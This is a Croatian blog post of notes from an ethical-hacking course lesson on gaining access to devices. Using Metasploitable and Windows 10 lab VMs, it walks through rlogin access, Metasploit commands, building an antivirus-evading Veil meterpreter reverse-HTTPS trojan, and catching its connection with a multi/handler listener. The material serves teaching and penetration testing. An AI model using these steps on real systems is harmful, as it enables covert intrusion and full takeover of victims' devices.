7. Dobivanje pristupa (eng. Gaining access)

U ovoj kratkoj lekciji predavač opisuje načine na koji se može dobiti pristup nad uređajem. Uređaj u ovom slučaju može biti bilo koja naprava koja je spojena na internet (laptop, smart tv, mobitel...).
  • Server side napadi
    •  Ne zahtjeva interakciju od korisnika, koristi se uglavnom za napade na servere  koji rade na automatizirani način. Sve što je potrebno za napad je poznavanje IP adrese mete. Koristi nedostatke u operativnim sustavima kako bi omogućila pristup napadaču.
  • Client side napadi
    • Zahtjeva od korisnika napadnutog uređaja napravi nešto. Odnosno pristane na instaliranje ažuriranja, otvaranje slike, otvaranje .exe datoteke ili nešto slično. Tada se na njegov uređaj instalira trojan virus, iliti stražnji ulaz (eng. backdoor) kojeg napadač može koristiti za dobivanje pristupa nad uređajem.

7.1. Server side napadi

Najčešće se koriste nad web serverima i serverima općenito, zbog toga što su osobna računala uglavnom skrivena iza rutera, stoga je prikupljanje informacija za takve uređaje nemoguće pošto nemaju vlastitu IP adresu.
Prikupljanje informacija je prvi korak u server side napadima, ono nam koristi pri otkrivanju operativnog sustava, otvorenih portova, aplikacija koje koriste te portove. Prikupljaju se pomoću već ranije spomenutog alata Zenmap, sve što je potrebno je upisati IP adresu mete, a alat će vratiti željene informacije.
Za praćenje ove lekcije, potrebno je preuzeti Metasploitable operativni sustav čija je instalacija objašnjena unutar 2. poglavlja.
Predavač prikazuje informacije koje su rezultat skeniranja IP adrese na kojoj je instaliran Metasploitable operativni sustav. Tamo obraća pažnju polaznicima na otvorene portove i aplikacije koje ih koriste. Za primjer uzima port 512 koji korisiti aplikaciju netkit-rsh (Slika 1.).
Slika 1.

Jednostavnom Google pretragom mogu se otkriti informacije o toj aplikaciji i postoje li greške koje se mogu iskorisiti protiv nje.  U ovom slučaju to je SSH klijent kojeg je potrebno instalirati na Kali Linux pomoću "apt-get" naredbe. Tada se može koristiti aplikacija za spajanje na metu pomoću narebe "rlogin [-l user] host" (Slika 2), što će odobriti pristup napadaču za potpunu kontrolu nad uređajem.
Slika 2.

7.1.2. Stražnji ulaz (eng. backdoor)

Stražnji ulaz je ponekad namjerno ubačen u aplikaciju kako bi dopustio udaljenom računalu spajanje na uređaj. Neki od tih stražnjih ulaza imaju slabosti koji se može iskoristiti za neovlašteno spajanje na uređaj.
Metasploit je alat unaprijed instaliran na Kali Linux-u koji se koristi za izradu i pokretanje napada na te slabosti. Također se može koristiti za skeniranje portova, identificiranje servisa itd. Neke od naredbi su:
  • msfconsole : pokreće alat
  • help : prikazuje upute
  • show [something] : prikazuje informacije o napadu (eng. exploit)
  • use [something] : označuje koji će se napad koristiti
  • set [option] [value] : za promjenu opcija unutar alata, recimo "set ip 127.0.0.1"
  • exploit : pokreće napad
U sljedećih nekoliko videa predavač pregledava otvorene portove na Metasploitable operativnom sustavu i prikaže kako se iskorištavaju slabbosti nekih (Slika 3.).
Slika 3.

7.2 Client side napadi

Ukoliko server side napad nije uspješan zbog nekog razloga, kao recimo da meta nema vlastitu IP adresu već je iza rutera ili na sustavu nema slabosti koje server side napad može iskoristiti, tada se koriste client side napadi.
Oni zahtjevaju korisničku interakciju koja se sastoji od instaliranja ažuriranja, programa ili npr otvaranja slike, na taj način napadač može potajno ubaciti svoj virus u uređaj od mete. Zahtjevaju puno iscrpnije prikupljanje informacija, što bi značilo da uz sve informacije koje se prikupljaju za server side napad, također se prikupljaju informacije o samom korisniku, koje stranice posjećuje, sa kojim ljudima kontaktira itd.
Za ovo poglavlje predavač ćekoristiti Windows 10 na virutalnoj mašini kao metu, a Kali Linux kao napadački uređaj.

7.2.1. Veil alat

Služi za izradu prilagođenih stražnjih ulaza odnosno trojan virusa, koje po mogućnosti anti virus program ne prepoznaje kao prijetnju.
Nije uključen u Kali Linux instalaciju već ga je potrebno preuzeti sa github-a. Što se u Linux-u izvršava naredbom "git clone https://github.com/Veil-Framework/Veil.git" koja će preuzeti željeni alat u direktorij.
Instalacija se pokreće iz config direktorija unutar glavnog Veil direktorija sa naredbom "./setup.sh" što će preuzeti sve aplikacije i knjižnice (eng. libraries) koje su potrebne za ispravan rad Veil-a.
 Za pokretanje potrebno se nalaziti u direktoriju gdje je Veil raspakiran te jednostavno upisati naredbu "./Veil.py".
U nastavku su polaznici upoznati sa alatom na način da predavač započne korake za izradu prvog trojan virusa.
  1. list - naredba koja otkriva da Veil ima dva glavna alata
    • 1) Evasion - genenrira trojan virus 
    • 2) Ordnance - generira djelove koda (eng. payloads) za trojan virus
  2. use 1 - za korištenje Evasion-a
  3. list - prikazuje listu payloads-a
    • Svaki je zapisan u sljedećem obliku: [programski jezik]/[tip payload-a]/[ime payload-a]
    • Za primjer koristit će se: "15) go/meterpreter/rev_https.py"
  4.  use 15 - za odabir payload-a što će prikazati opcije koje treba postaviti
  5. set LHOST [IP] - gdje je IP adresa uređaja napadača, na koju će se meta spojiti nakon što pokrene virus
  6. set LPORT 8080 - kako promet nebi izgledao sumnjivo meti ni njegovom vatrozidu (eng. firewall) pošto se koristi kao web port kao i 80
  7. Potrebno je izmjeniti što više opcija iz razloga što anti virus programi uspoređuju potpis svake datoteke koju skeniraju sa velikom bazom potpisa od ponzatih virusa. Ukoliko potpis datoteke ne odgovara ni jednom od njih, dopušta se izvođenje na računalu.
  8. set PROCESSORS 1 - kako bi potpis izgledao drugačije
  9. set SLEEP 6 
  10. generate - izrada virusa, traži unos naziva, može biti bilo koji
Virus koji je stvoren koristi obrnuti payload, što znači da ne otvara nove portove na uređaju mete, već se spaja sa uređaja mete na računalo napadača.

7.2.2. Slušanje dolazećih veza (eng. Listening to incoming connections)

Potrebno je otvoriti port kako bi se virus sa uređaja mete mogao spojiti na napadačevo računalo. Za primjer izrade virusa je korišten port 8080 koji sada treba otvoriti i payload "go/meterpreter/rev_https.py".
S time na umu, pokreće se ranije spominjan Metasploit sa naredbom "msfconsole".
  1. use exploit/multi/handler - modul koji se koristi za slušanje dolazećih veza
  2. show options - opcije koje je moguće postaviit za modul
  3. set PAYLOAD windows/meterpreter/rev_https - postavljanje payload-a da odgovara payload-u virusa
  4. set LHOST [ip] -  gdje je IP adresa uređaja napadača, na koju će se meta spojiti nakon što pokrene virus
  5. set LPORT 8080 - port koji se koristio za izradu virusa
  6. exploit - Metasploit sada čeka nadolezeće veze dok meta ne pokrene virus
Za testiranje virusa prebacuje ga se na Windows 10 sa koje se pokreće. O detaljnijim metodama dostavljanja virusa biti će riječi kasnije.
Kada meta pokrene virus, automatski se spaja na Metasploit konzolu u kojoj tada napadač ima potpunu kontrolu.

Primjedbe

Objavi komentar

Popularni postovi s ovog bloga

3. Linux osnove (eng. Linux basics)

Slika
U ovo predavanju predavač pokazuje radno okruženje Kali Linux-a s kojim će polaznici biti suočeni od sad pa na dalje. U startnom izborniku se nalaze alati koji su potrebni za etičko hakiranje kategorizirani po tipu napada. Pokraj kojeg se nalaze moji dokumenti sa nazivom "Places", gdje je predavač dodatno objasnio strukturu Linux operativnog sustava i koje ćemo direktorije najčešće koristit. Ističe da za razliku od Windows-a, Linux podržava više takozvanih radnih prostora na kojima se mogu nalaziti različite ikone na radnoj površini i/ili različiti otvoreni prozori. U nastavku su pokazani osnovni meniji za settings-e i bežičnu internet mrežu koji su jako slični onima na Windows-u. 3.1 Terminal i Linux komande (eng. the terminal and linux commands) Linux terminal je konzolni prozor u kojemu se može mjenjati bilo koja postavka operativnog sustava te izvoditi bilo koji program instaliran na OS. Predavač ističe kako je terminal veoma moćan alat koji uglavnom ima više opci...
Pročitajte više

5. Testiranje napada na mreže - Napadi prije spajanja (eng. Network Penetration Testing - Pre Connection Attacks)

Slika
Prije početka ove lekcije, treba provjeriti je li mrežna kartica trenutno u "monitor" modu kao što je objašnjeno u prošloj lekciji. Nakon toga korisnik može započeti pregledavati dostupne mreže u svojoj fizičkoj okolici sa naredbom "airodump-ng mon0" gdje "mon0" označava naziv sučelja (eng. interface) mrežne kartice u "monitor" modu (Slika 1.).   Slika 1. Gdje stupci redom označavaju: BSSID - MAC adresa rutera  PWR - Fizičku blizinu rutera, što je veći broj to je ruter bliži Beacons - Signali koji ruter šalje #Data - Broj preuzetih paketa #/s - Broj preuzetih paketa u zadnjih 10 sekundi CH - Broj kanala na kojem ruter odašilje MB - Maksimalna brzina rutera ENC - Enkripcija koja se koristi kao zaštita CIPHER - Dekripcija koja se koristi AUTH - Tip autentikacije ESSID - Naziv rutera 5.1. Ciljano njuškanje paketa (eng. Targeted packet sniffing) Predavač za primjer uzima svoju kućnu mrežu sa WPA enkripcijom na kojoj će vršiti n...
Pročitajte više